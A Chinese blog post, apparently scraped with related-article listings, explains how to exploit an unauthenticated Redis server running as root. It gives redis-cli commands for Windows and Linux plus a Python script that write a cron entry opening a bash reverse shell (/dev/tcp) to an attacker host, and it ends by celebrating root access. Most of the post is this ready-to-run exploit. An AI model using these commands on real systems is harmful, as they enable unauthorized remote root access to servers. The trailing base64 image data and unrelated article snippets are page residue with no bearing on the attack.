前提:

1.redis由root用户启动。

2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。

启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列)    sudo /etc/init.d/cron start (ubuntu系列)

一.windows下

config set dir /var/spool/cron
config set dbfilename root
set 1 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"
save

二.linux下

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -x set 1
redis-cli -h 192.168.118.129 config set dir /var/spool/cron/
redis-cli -h 192.168.118.129 config set dbfilename root
redis-cli -h 192.168.118.129 save

三.再贴一段python代码

import redis

def shell_exploit():

    try:

        r =redis.StrictRedis(host='192.168.118.129',port=6379,db=0,socket_timeout=10)

        r.set(1, '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/your_ip/3333 0>&1\n\n')

        r.config_set('dir','/var/spool/cron')

        r.config_set('dbfilename','root')

        r.save()

        print "success!"

    except:

        print "fail!"

        pass

shell_exploit()

反弹成功,root权限!

aaarticlea/png;base64,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" alt="" />

redis写定时任务获取root权限的更多相关文章

  1. Redis未授权访问写Webshell和公私钥认证获取root权限

    0x01 什么是Redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服 ...

  2. Debian普通用户获取root权限|sudo的安装与配置

    Debian系统的普通用户需要安装软件时,往往会收到“Permission denied”的提示,这时候需要root权限.那么如何在不登陆超级管理员账户的前提下拥有root权限呢?对于大多数Linux ...

  3. android中获取root权限的方法以及原理(转)

    一. 概述 本文介绍了android中获取root权限的方法以及原理,让大家对android 玩家中常说的“越狱”有一个更深层次的认识. 二. Root 的介绍 1. Root 的目的 可以让我们拥有 ...

  4. Linaro系统获取root权限方法

    在Zedboard上根据教程安装Linaro Ubuntu后出现一只无法获取Root权限,导致无法挂载U盘等问题. 具体体现在sudo -s命令之后,出现如sudo:must be setuid ro ...

  5. 一则利用内核漏洞获取root权限的案例【转】

    转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...

  6. Android 上SuperUser获取ROOT权限原理解析

    Android 上SuperUser获取ROOT权限原理解析 一. 概述 本文介绍了android中获取root权限的方法以及原理,让大家对android 玩家中常说的“越狱”有一个更深层次的认识. ...

  7. 获取root权限及破解原理分析

    2012-03-18 17:58:45|  分类: android |字号 订阅 如今Android系统的root破解基本上成为大家的必备技能!网上也有非常多中一键破解的软件,使root破解越来越ea ...

  8. Linux基本常用命令|ubuntu获取root权限

    我用的是ubuntu12.4系统,因为默认是没有获取root的权限的 下边讲解怎么获取root权限 在终端中输入: sudo passwd root Enter new UNIX password: ...

  9. Android应用请求获取Root权限

    应用获取Root权限的原理:让应用的代码执行目录获取最高权限.在Linux中通过chmod 777 [代码执行目录] /** * 应用程序运行命令获取 Root权限,设备必须已破解(获得ROOT权限) ...

随机推荐

  1. Putty+Xming实现在Windows客户端显示Linux服务器端的图形化程序

    走了不少弯路啊~~~言归正传,最近研发和我说要在一台EC2的机器上运行一个带GUI的程序,当时我就纳闷了:EC2的机器应该没有桌面套件的吧,那该怎么运行GUI的程序呢?百思不得其解时收到一封邮件,大致 ...

  2. From 易水寒 格局越大 人生越宽

    有这么一则故事:三个泥瓦匠在砌墙,一个人走过来,问他们在干什么. 第一个泥瓦匠没好气地说,你没看见吗?我在辛苦地砌墙呢.第二个回答,我们正在建一座高楼.第三个则洋溢着喜悦说,我们正在创造美好生活. 1 ...

  3. TCP&UDP基础

    TCP TCP/IP是一种网络通讯协议,而socket则是TCP/IP网络最为通用的API,即一种应用程序接口,称为套接字.TCP是面向连接的协议,在进行数据收发前必须连接,且在收发时必须保持该连接. ...

  4. 数组 javaScript权威指南笔记

    创建数组 var a=[1,2,3,4] var arr=new Array() var arr=new Array(10);//创建长度为10的数组   var arr=new Array(1,2, ...

  5. BZOJ1853_幸运数字

    如果一个数字仅由6或者8构成,那么这个数字是幸运数字:如果一个数字是幸运数字的倍数,那么就是近似的幸运数. 给定区间,求有多少个近似幸运数字位于这个区间之内. 典型的容斥原理. 首先,弄出所有的幸运数 ...

  6. iOS 一些常见问题

    1.屏幕横屏时 xib上拖拉的控件不会跟着横过来: 是因为在主文件面里的 main interface 方框里的main 没有删除: 2.运行出现你没有权限 : 清理一下: 3.将对象转成字符串: / ...

  7. js模块化的总结

    从前端打包的历史谈起 在很长的一段前端历史里,是不存在打包这个说法的.那个时候页面基本是纯静态的或者服务端输出的, 没有 AJAX,也没有 jQuery.Google 推出 Gmail 的时候(200 ...

  8. 左连接,右连接和等值连接(left join,right join和inner join)

    left join(左联接) 返回包括左表中的所有记录和右表中联结字段相等的记录 right join(右联接) 返回包括右表中的所有记录和左表中联结字段相等的记录inner join(等值连接) 只 ...

  9. BZOJ 3339: Rmq Problem

    3339: Rmq Problem Time Limit: 20 Sec  Memory Limit: 128 MBSubmit: 1075  Solved: 549[Submit][Status][ ...

  10. HDU.5692 Snacks ( DFS序 线段树维护最大值 )

    HDU.5692 Snacks ( DFS序 线段树维护最大值 ) 题意分析 给出一颗树,节点标号为0-n,每个节点有一定权值,并且规定0号为根节点.有两种操作:操作一为询问,给出一个节点x,求从0号 ...